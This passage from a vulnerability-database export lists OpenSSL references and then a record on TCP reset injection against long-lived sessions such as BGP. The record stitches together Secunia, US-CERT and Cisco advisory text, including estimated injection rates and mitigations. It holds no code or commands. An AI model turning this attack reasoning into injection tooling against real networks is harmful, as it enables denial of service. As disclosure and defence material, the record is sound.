          {
            "trust": 0.3,
            "url": "http://blog.pfsense.org/?p=351"
          },
          {
            "trust": 0.3,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=654656"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote.php?ver=471"
          },
          {
            "trust": 0.3,
            "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=511509"
          },
          {
            "trust": 0.3,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=479650"
          },
          {
            "trust": 0.3,
            "url": "http://www.innominate.com/data/downloads/manuals/releasenotes_mguard_516_en.pdf"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/499827"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/499855"
          },
          {
            "trust": 0.3,
            "url": "http://support.f5.com/kb/en-us/solutions/public/11000/500/sol11503.html?sr=10949137"
          },
          {
            "trust": 0.3,
            "url": "http://www.openbsd.org/errata44.html#007_openssl"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2009-057.htm"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2009-116.htm"
          },
          {
            "trust": 0.3,
            "url": "https://www.isc.org/node/373"
          },
          {
            "trust": 0.3,
            "url": "https://www13.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c01743291"
          },
          {
            "trust": 0.3,
            "url": "http://www13.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02227287\u0026admit=109447627+1276778491548+28353475"
          },
          {
            "trust": 0.3,
            "url": "http://www.mail-archive.com/openssl-users@openssl.org/msg55534.html"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2009-0046.html"
          },
          {
            "trust": 0.3,
            "url": "https://support.f5.com/kb/en-us/solutions/public/9000/700/sol9762.html"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5077"
          },
          {
            "trust": 0.2,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.2,
            "url": "http://bugs.gentoo.org."
          },
          {
            "trust": 0.2,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.2,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_i386.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch2.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_amd64.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_mipsel.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_s390.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_hppa.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_ia64.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_sparc.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_mips.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch2.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_powerpc.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://packages.debian.org/\u003cpkg\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_alpha.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/softwaredescription.jsp?switem=mtx-8300d57bb5424791b0e61652e8"
          },
          {
            "trust": 0.1,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/softwaredescription.jsp?switem=mtx-b35b8e125d17427fa8a74e9ef6"
          },
          {
            "trust": 0.1,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/softwaredescription.jsp?switem=mtx-d7bcce2dc82d43daaec308eb40"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5814"
          },
          {
            "trust": 0.1,
            "url": "http://software.hp.com"
          },
          {
            "trust": 0.1,
            "url": "https://www.hp.com/go/swa"
          },
          {
            "trust": 0.1,
            "url": "http://gridengine.sunsource.net/"
          },
          {
            "trust": 0.1,
            "url": "https://www.isc.org/products/bind"
          },
          {
            "trust": 0.1,
            "url": "http://www.openevidence.org/"
          },
          {
            "trust": 0.1,
            "url": "http://eid.belgium.be/"
          },
          {
            "trust": 0.1,
            "url": "http://ocert.org"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0021"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0025"
          },
          {
            "trust": 0.1,
            "url": "http://gale.org/"
          },
          {
            "trust": 0.1,
            "url": "http://www.zxid.org/"
          },
          {
            "trust": 0.1,
            "url": "http://openssl.org/news/secadv_20090107.txt"
          },
          {
            "trust": 0.1,
            "url": "http://lasso.entrouvert.org/"
          },
          {
            "trust": 0.1,
            "url": "http://openssl.org/"
          },
          {
            "trust": 0.1,
            "url": "http://www.google.com/codesearch/p?#1vgzyqx--lu/achilles/remailer/zero-knowledge/freedomserver-2.x.tgz/"
          },
          {
            "trust": 0.1,
            "url": "http://www.ntp.org/"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0021"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0021"
          },
          {
            "trust": 0.1,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200902-02.xml"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/glsa/glsa-200904-05.xml"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.1,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376"
          },
          {
            "db": "BID",
            "id": "33150"
          },
          {
            "db": "PACKETSTORM",
            "id": "73756"
          },
          {
            "db": "PACKETSTORM",
            "id": "77647"
          },
          {
            "db": "PACKETSTORM",
            "id": "76268"
          },
          {
            "db": "PACKETSTORM",
            "id": "73658"
          },
          {
            "db": "PACKETSTORM",
            "id": "76379"
          },
          {
            "db": "PACKETSTORM",
            "id": "73698"
          },
          {
            "db": "PACKETSTORM",
            "id": "74909"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5077"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376",
            "ident": null
          },
          {
            "db": "BID",
            "id": "33150",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "73756",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "77647",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "76268",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "73658",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "76379",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "73698",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "74909",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5077",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2010-03-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2010-0376",
            "ident": null
          },
          {
            "date": "2009-01-07T00:00:00",
            "db": "BID",
            "id": "33150",
            "ident": null
          },
          {
            "date": "2009-01-12T21:47:55",
            "db": "PACKETSTORM",
            "id": "73756",
            "ident": null
          },
          {
            "date": "2009-05-19T23:02:50",
            "db": "PACKETSTORM",
            "id": "77647",
            "ident": null
          },
          {
            "date": "2009-04-01T22:41:01",
            "db": "PACKETSTORM",
            "id": "76268",
            "ident": null
          },
          {
            "date": "2009-01-07T20:17:20",
            "db": "PACKETSTORM",
            "id": "73658",
            "ident": null
          },
          {
            "date": "2009-04-06T23:59:06",
            "db": "PACKETSTORM",
            "id": "76379",
            "ident": null
          },
          {
            "date": "2009-01-09T20:52:12",
            "db": "PACKETSTORM",
            "id": "73698",
            "ident": null
          },
          {
            "date": "2009-02-12T21:44:44",
            "db": "PACKETSTORM",
            "id": "74909",
            "ident": null
          },
          {
            "date": "2009-01-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200901-055",
            "ident": null
          },
          {
            "date": "2009-01-07T17:30:00.327000",
            "db": "NVD",
            "id": "CVE-2008-5077",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2010-03-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2010-0376",
            "ident": null
          },
          {
            "date": "2015-04-13T22:13:00",
            "db": "BID",
            "id": "33150",
            "ident": null
          },
          {
            "date": "2022-03-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200901-055",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2008-5077",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "F5 FirePass OpenSSL has an unknown vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "_id": null,
        "data": "input validation error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200408-0145

    Vulnerability from variot - Updated: 2026-03-09 22:48

    TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. TCP Has a sequence number TCP There is a problem that it is justified if it is within the window. Therefore, there is a vulnerability that makes it easy to guess the external sequence number when establishing a long-term connection that increases the window size. Note that products affected by this vulnerability TCP Covers many products with implementation. For more information, NISCC-236929 (JVN) , NISCC Advisory 236929 (CPNI Advisory 00391) Please check also.A third party TCP By predicting the sequence number of a particular TCP Service operation interruption such as forcibly terminating a connection (DoS) There is a possibility of being attacked. A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. Few factors may present viable target implementations, such as imlementations that: - depend on long-lived TCP connections - have known or easily guessed IP address endpoints - have known or easily guessed TCP source ports. As a result, this issue is likely to affect a number of routing platforms. Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. **Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. The following products and versions are affected: Oracle Solaris 10, 11; Openpgp 2.6.2; Mcafee Network Data Loss Prevention 8.6 and earlier, 9.2.0, 9.2.1, 9.2.2; Netbsd 1.5, Version 1.5.1, Version 1.5.2, Version 1.5.3, Version 1.6, Version 1.6.1, Version 1.6.2, Version 2.0; Xinuos Openserver Version 5.0.6, Version 5.0.7; Juniper Networks Junos OS; Xinuos Unixware Version 7.1.1, Version 7.1.3.


    Want a new IT Security job?

    Vacant positions at Secunia: http://secunia.com/secunia_vacancies/


    TITLE: Avaya Intuity Audix TCP Connection Reset Vulnerability

    SECUNIA ADVISORY ID: SA15263

    VERIFY ADVISORY: http://secunia.com/advisories/15263/

    CRITICAL: Less critical

    IMPACT: DoS

    WHERE:

    From remote

    OPERATING SYSTEM: Avaya Intuity Audix R5 http://secunia.com/product/4586/

    DESCRIPTION: Avaya has acknowledged a vulnerability in Intuity Audix, which can be exploited by malicious people to reset established TCP connections on a vulnerable system.

    For more information: SA11440

    SOLUTION: A patch will reportedly be included in the next major release.

    ORIGINAL ADVISORY: Avaya: http://support.avaya.com/elmodocs2/security/ASA-2005-097_SCASA-2005-14.pdf

    OTHER REFERENCES: SA11440: http://secunia.com/advisories/11440/


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Routing operations would recover quickly after such attacks ended.

    I. Description

    In 2001, the CERT Coordination Center released CA-2001-09, describing statistical weaknesses in various TCP/IP Initial Sequence generators. In that document (http://www.cert.org/advisories/CA-2001-09.html), it was noted by Tim Newsham:

     [I]f a sequence number within the receive window is known, an
     attacker can inject data into the session stream or terminate the
     connection. If the ISN value is known and the number of bytes sent
     already sent is known, an attacker can send a simple packet to
     inject data or kill the session.
    

    Paul Watson has performed the statistical analysis of this attack when the ISN is not known and has pointed out that such an attack could be viable when specifically taking into account the TCP Window size. He has also created a proof-of-concept tool demonstrating the practicality of the attack. The National Infrastructure Security Co-Ordination Centre (NISCC) has published an advisory summarizing Paul Watson's analysis in "NISCC Vulnerability Advisory 236929," available at http://www.uniras.gov.uk/vuls/2004/236929/index.htm.

    Since TCP is an insecure protocol, it is possible to inject transport-layer packets into sessions between hosts given the right preconditions. For detailed information about BGP and some tips for securing it, please see Cisco System's documentation (http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/bgp.htm or Team Cymru (http://www.cymru.com/). This may result in a brief loss of service until the fresh routing tables are created. When this is taken into account, instead of attempting to send a spoofed packet with all potential sequence numbers, the attacker would only need to calculate an valid sequence number that falls within the next expected ISN plus or minus half the window size. According to Paul Watson's report, with a typical xDSL data connection (80 Kbps, upstream) capable of sending of 250 packets per second (pps) to a session with a TCP Window size of 65,535 bytes, it would be possible to inject a TCP packet approximately every 5 minutes. It would take approximately 15 seconds with a T-1 (1.544 Mbps) connection. These numbers are significant when large numbers of compromised machines (often called "botnets" or "zombies") can be used to generate large amounts of packets that can be directed at a particular host.

    To protect against such injections, RFC 2385 provides a method of using MD5 signatures on the TCP Headers. If this form of verification is supported and enabled between two peers, then an attacker would have to obtain the key used to transmit the packet in order to successfully inject a packet into the TCP session. Another alternative would be to tunnel BGP over IPSec. Again, this would provide a form of authentication between the BGP peers and the data that they transmit. The lack of authentication when using TCP for BGP makes this type of attack more viable.

    US-CERT is tracking this issue as VU#415294. This reference number corresponds to CVE candidate CAN-2004-0230. NISCC is tracking this issue as Advisory 236929.

    II. Impacts could range from data corruption or session hijacking to a denial-of-service condition.

    III. Solution

    Apply a patch from your vendor

    Please see you vendor's statement regarding the availability of patches, updates and mitigation strategies. The lack of cryptographically-strong security options for the TCP header itself is a deficiency that technologies like IPSec try to address. It must be noted that in the final analysis that if an attacker has the ability to see unencrypted TCP traffic generated from a site, that site is vulnerable to various TCP attacks - not just those mentioned here. A stronger measure that would aid in protecting against such TCP attacks is end-to-end cryptographic solutions like those outlined in various IPSec documents.

    The key idea with an end-to-end cryptographic solution is that there is some secure verification that a given packet belongs in a particular stream. However, the communications layer at which this cryptography is implemented will determine its effectiveness in repelling ISN based attacks. Solutions that operate above the Transport Layer (OSI Layer 4), such as SSL/TLS and SSH1/SSH2, only prevent arbitrary packets from being inserted into a session. They are unable to prevent a connection reset (denial of service) since the connection handling will be done by a lower level protocol (i.e., TCP). On the other hand, Network Layer (OSI Layer 3) cryptographic solutions such as IPSec prevent both arbitrary packets entering a transport-layer stream and connection resets because connection management is directly integrated into the secure Network Layer security model.

    The solutions presented above have the desirable attribute of not requiring any changes to the TCP protocol or implementations to be made. RFC2385 ("Protection of BGP Sessions via the TCP MD5 Signature Option") and other technologies provide options for adding cryptographic protection within the TCP header at the cost of some potential denial of service, interoperability, and performance issues.

    Ingress filtering

    Ingress filtering manages the flow of traffic as it enters a network under your administrative control. You can configure your BGP routers to only accept packets on a specific network connection. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authorized services. In this fashion, the effectiveness of many intruder scanning techniques can be dramatically reduced.

    Network Isolation

    Complex networks can benefit by separating data channels and control channels, such as BGP, into different logical or physical networks. Technologies such as VLANs, VPNs, leased links, NAT may all be able to contribute to separating the tranmission of control information from the transmission of the data stream.

    Egress filtering

    Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet.

    In the case of BGP, only your BGP routers should be establishing connections to your peers. Other BGP traffic generated on your network could be a sign of an attempted attack.

    Appendix A. As vendors report new information to US-CERT, we will update the vulnerability note. If a particular vendor is not listed in either the NISCC advisory, or the vulnerability, we recommend that you contact them for their comments. ___________

    US-CERT thanks Paul Watson, Cisco Systems and NISCC for notifying us about this problem and for helping us to construct this advisory. ___________

    Feedback can be directed to the US-CERT Technical Staff. ___________

    Copyright 2004 Carnegie Mellon University. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    Cisco Security Advisory:\xa0TCP Vulnerabilities in Multiple IOS-Based Cisco Products

    Revision 1.0

    For Public Release 2004 April 20 21:00 UTC (GMT)


    Summary

    A vulnerability in the Transmission Control Protocol (TCP) specification (RFC793) has been discovered by an external researcher. The successful exploitation enables an adversary to reset any established TCP connection in a much shorter time than was previously discussed publicly. Depending on the application, the connection may get automatically re-established. In other cases, a user will have to repeat the action (for example, open a new Telnet or SSH session). Depending upon the attacked protocol, a successful attack may have additional consequences beyond terminated connection which must be considered. This attack vector is only applicable to the sessions which are terminating on a device (such as a router, switch, or computer) and not to the sessions that are only passing through the device (for example, transit traffic that is being routed by a router). In addition, this attack vector does not directly compromise data integrity or confidentiality.

    This advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml, and it describes this vulnerability as it applies to Cisco products that run Cisco IOS\xae software.

    A companion advisory that describes this vulnerability for products that do not run Cisco IOS software is available at http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml. The severity of the exposure depends upon the protocols and applications that utilize TCP.

